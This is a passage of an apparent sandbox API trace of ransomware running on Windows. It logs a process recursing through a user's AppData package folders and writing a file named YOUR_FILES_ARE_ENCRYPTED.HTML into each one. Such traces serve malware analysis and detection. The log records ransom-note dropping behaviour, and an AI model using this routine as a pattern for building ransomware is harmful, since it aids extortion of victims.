lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.480] CloseHandle (hObject=0x32c) returned 1 [0118.480] GetProcessHeap () returned 0x600000 [0118.480] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.480] GetProcessHeap () returned 0x600000 [0118.480] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0118.480] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0118.480] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.480] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCookies") returned 115 [0118.480] GetProcessHeap () returned 0x600000 [0118.480] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0118.480] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCookies" [0118.480] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\*" [0118.480] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5db8, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0118.481] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5db8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0118.481] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5db8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0118.481] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0118.481] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0118.481] GetProcessHeap () returned 0x600000 [0118.481] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cloudexperiencehost_cw5n1h2txyewy\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0118.483] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.485] CloseHandle (hObject=0x32c) returned 1 [0118.485] GetProcessHeap () returned 0x600000 [0118.485] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.485] GetProcessHeap () returned 0x600000 [0118.485] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0118.486] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0118.486] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.486] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetHistory") returned 115 [0118.486] GetProcessHeap () returned 0x600000 [0118.486] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0118.487] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetHistory" [0118.487] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\*" [0118.487] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5db8, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626638 [0118.488] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5db8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0118.488] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5db8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0118.488] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0118.488] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0118.488] GetProcessHeap () returned 0x600000 [0118.488] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.489] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cloudexperiencehost_cw5n1h2txyewy\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0118.490] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.491] CloseHandle (hObject=0x32c) returned 1 [0118.491] GetProcessHeap () returned 0x600000 [0118.491] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.491] GetProcessHeap () returned 0x600000 [0118.491] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0118.492] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="Temp", cAlternateFileName="")) returned 1 [0118.492] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.492] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\Temp") returned 108 [0118.492] GetProcessHeap () returned 0x600000 [0118.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0118.494] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\Temp" [0118.494] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\Temp\\*" [0118.494] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5db8, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0118.494] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5db8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0118.494] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5db8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0118.494] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0118.494] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0118.495] GetProcessHeap () returned 0x600000 [0118.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cloudexperiencehost_cw5n1h2txyewy\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0118.496] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.497] CloseHandle (hObject=0x32c) returned 1 [0118.497] GetProcessHeap () returned 0x600000 [0118.497] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.497] GetProcessHeap () returned 0x600000 [0118.497] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0118.498] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="Temp", cAlternateFileName="")) returned 0 [0118.498] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0118.498] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0118.498] GetProcessHeap () returned 0x600000 [0118.498] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.499] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cloudexperiencehost_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.499] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.500] CloseHandle (hObject=0x324) returned 1 [0118.500] GetProcessHeap () returned 0x600000 [0118.501] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.501] GetProcessHeap () returned 0x600000 [0118.501] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.501] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558439bd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558439bd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558439bd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0118.501] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.501] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AppData") returned 108 [0118.501] GetProcessHeap () returned 0x600000 [0118.501] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.502] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AppData" [0118.502] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AppData\\*" [0118.502] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558439bd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558439bd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558439bd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0118.503] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558439bd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558439bd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558439bd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0118.503] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558439bd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558439bd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558439bd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0118.503] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0118.503] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0118.503] GetProcessHeap () returned 0x600000 [0118.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cloudexperiencehost_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.504] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.505] CloseHandle (hObject=0x324) returned 1 [0118.505] GetProcessHeap () returned 0x600000 [0118.505] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.505] GetProcessHeap () returned 0x600000 [0118.505] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.505] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558439bd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558439bd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558439bd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0118.505] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.505] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalCache") returned 111 [0118.505] GetProcessHeap () returned 0x600000 [0118.505] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.505] lstrcpyW (in: lpString1=0x314b010, 